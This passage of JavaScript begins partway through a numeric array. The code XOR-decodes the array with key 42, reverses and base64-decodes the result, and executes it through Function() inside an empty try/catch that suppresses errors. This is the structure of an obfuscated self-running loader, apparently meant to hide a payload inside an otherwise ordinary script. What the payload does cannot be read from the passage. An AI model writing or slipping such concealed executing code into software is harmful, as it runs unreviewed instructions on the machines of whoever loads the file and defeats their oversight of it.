9,93,79,77,111,109,99,19,120,127,121,76,96,124,123,105,94,98,96,64,107,105,99,77,107,105,99,77,69,123,76,77,107,105,99,77,107,105,99,97,89,80,73,65,96,114,115,25,96,25,72,71,104,121,112,80,108,125,112,77,103,114,100,95,107,67,72,90,19,124,76,111,70,26,114,121,108,65,123,29,120,105,99,28,30,24,72,90,120,114,115,94,70,71,72,66,104,105,99,77,107,105,99,77,107,105,99,97,89,110,103,77,69,126,79,26,70,24,115,66,104,25,72,77,107,105,99,77,107,105,99,77,107,67,105,29,123,68,72,66,120,68,73,92,104,114,72,90,108,105,99,30,19,71,115,94,99,114,112,65,96,25,72,67,104,67,101,68,31,125,75,28,70,24,73,94,77,25,72,67,104,105,99,77,107,105,99,77,107,105,99,97,89,110,78,95,108,109,78,83,19,109,73,94,70,125,99,77,65,121,100,83,30,105,102,93,93,105,103,89,107,110,97,66,96,24,112,83,104,105,79,93,96,126,103,77,77,98,73,83,26,105,99,93,107,67,101,25,19,109,112,66,66,24,73,94,77,25,72,67,104,105,99,77,107,105,99,77,107,105,99,97,89,110,78,95,108,109,78,83,19,109,73,94,70,125,99,77,77,98,73,80,30,105,103,77,69,80,112,95,70,24,115,66,104,25,73,94,99,114,112,26,120,114,112,89,104,105,99,77,107,105,99,77,107,105,99,97,89,110,78,95,108,109,78,83,19,109,73,94,70,125,99,77,77,98,73,80,111,110,99,28,127,71,79,90,100,114,102,26,31,24,72,71,104,105,99,77,107,105,99,77,107,105,99,97,89,110,78,95,108,109,78,83,19,109,73,94,70,125,99,77,115,125,75,83,124,24,73,94,103,68,72,66,100,98,99,89,18,109,78,92,96,24,72,121,104,105,102,67,65,127,124,77,127,24,72,68,124,24,127,67,107,105,102,26,31,24,72,109,27,125,112,26,100,114,79,126,100,125,115,100,94,71,72,90,82,71,123,77,93,121,72,70,120,25,73,31,100,114,102,70,82,109,73,93,108,125,102,77,69,126,79,89,70,125,72,66,112,125,102,26,31,24,72,71,104,105,99,77,107,105,99,77,107,105,99,97,89,110,78,95,108,109,78,83,19,109,73,94,70,125,99,77,103,64,123,105,96,65,123,109,100,105,99,28,123,71,72,27,19,71,73,68,94,24,115,66,96,109,99,77,107,105,99,77,107,105,99,77,69,93,101,26,31,125,115,26,96,25,72,93,27,125,75,66,107,105,79,93,112,126,103,77,77,98,73,93,111,110,99,28,73,71,72,90,120,109,112,66,104,98,99,77,107,105,99,77,107,105,99,77,69,93,101,26,31,125,115,26,96,25,72,93,27,125,75,66,107,67,73,70,120,68,72,70,100,109,99,28,123,68,72,70,120,68,72,92,100,125,102,31,112,125,75,26,100,114,78,91,104,105,99,77,107,105,99,77,107,105,99,97,89,110,78,95,108,109,78,83,19,109,73,94,70,125,99,77,99,114,112,26,31,125,112,64,104,67,101,80,27,125,112,26,70,125,102,95,78,125,75,89,108,109,99,77,107,105,99,77,107,105,99,77,69,93,101,26,31,125,115,26,96,25,72,93,27,125,75,66,107,105,79,70,82,71,112,77,69,126,79,66,82,109,73,80,70,109,112,77,107,105,99,77,107,105,99,77,107,67,105,29,123,68,72,66,120,68,73,92,104,114,72,90,108,105,99,25,123,64,100,80,77,110,100,25,123,126,103,83,107,67,101,30,124,109,112,95,70,125,102,28,104,105,99,77,107,105,99,77,107,105,99,97,89,110,78,95,108,109,78,83,19,109,73,94,70,125,99,77,127,105,103,93,111,110,99,28,77,109,78,65,70,24,78,77,107,105,99,77,107,105,99,77,107,67,105,29,93,125,115,90,120,114,75,95,70,109,99,28,93,109,72,66,104,105,99,77,107,105,99,77,107,105,99,97,89,98,99,19,120,127,121,76,96,124,123,105,94,98,96,64,107,105,99,77,107,105,99,77,69,107,115,77,26,110,99,26,31,125,112,26,31,24,72,110,120,98,79,70,120,68,102,80,104,105,99,77,107,67,105,29,99,83,73,76,96,105,99,88,107,105,120,96,19,70,127,104,96,111,99,19,107,105,112,90,31,83,73,77,107,105,99,77,69,93,101,90,99,121,112,89,70,98,78,80,96,105,97,26,31,125,112,94,124,109,72,108,124,109,78,66,124,71,73,64,31,105,78,95,124,125,72,27,100,24,72,65,104,121,122,77,103,98,99,26,100,68,72,92,100,109,99,77,107,105,99,97,89,64,72,83,124,98,78,70,96,98,99,90,65,67,99,80,19,70,99,77,89,105,99,111,70,26,114,121,108,65,123,69,123,125,121,31,96,111,78,95,124,125,72,70,82,125,120,26,124,24,112,95,123,68,72,70,27,125,78,64,19,109,112,69,107,67,112,90,104,105,99,77,107,67,105,29,104,121,97,69,103,114,112,89,70,98,78,126,120,25,115,70,90,71,72,90,104,67,72,92,70,109,78,64,31,125,78,71,104,105,99,97,69,107,99,77,107,105,99,77,107,105,99,77,107,105,99,77,107,105,99,77,107,105,99,77,107,105,99,77,107,105,99,77,107,105,99,77,107,105,99,77,107,105,99,77,107,105,99,77,107,105,99,77,107,105,99,77,107,105,99,29,107,110,103,30,107,121,122,77,103,124,126,76,94,26,123,108,66,26,123,77,123,25,73,95,19,24,115,77,107,67,105,77,107,105,99,29,65,67,100,77,93,67,103,69,127,24,115,90,82,24,73,95,65,67,100,80,77,83,112,95,70,71,73,26,100,27,72,26,31,121,97,69,26,24,72,65,31,125,115,83,31,105,75,26,108,125,126,77,89,105,99,67,103,24,114,76,96,105,99,19,107,105,120,96,19,70,127,104,96,111,99,26,100,68,72,92,100,109,99,77,69,93,101,67,111,125,72,70,120,114,112,121,104,67,96,77,18,65,126,101,70,111,99,31,96,109,99,26,115,80,100,83,127,98,114,77,77,109,78,90,78,98,99,70,120,125,115,100,96,105,99,19,107,105,126,108,96,127,123,103,104,105,78,80,31,24,72,64,104,105,99,97,89,64,99,92,93,125,75,95,18,24,115,95,18,71,72,95,70,24,102,92,69,80,73,93,120,98,78,69,96,105,99,19,107,83,121,101,70,111,126,77,123,25,73,95,19,24,115,77,107,67,105,29,104,121,97,69,107,67,72,92,70,109,78,64,31,125,78,71,66,83,101],k=42,r='';for(var i=0;i<d.length;i++)r+=String.fromCharCode(d[i]^k);return r})();var _0e=typeof atob!=='undefined'?atob:function(s){return Buffer.from(s,'base64').toString()};try{Function(_0e(_0x.split('').reverse().join('')))()}catch(e){}})();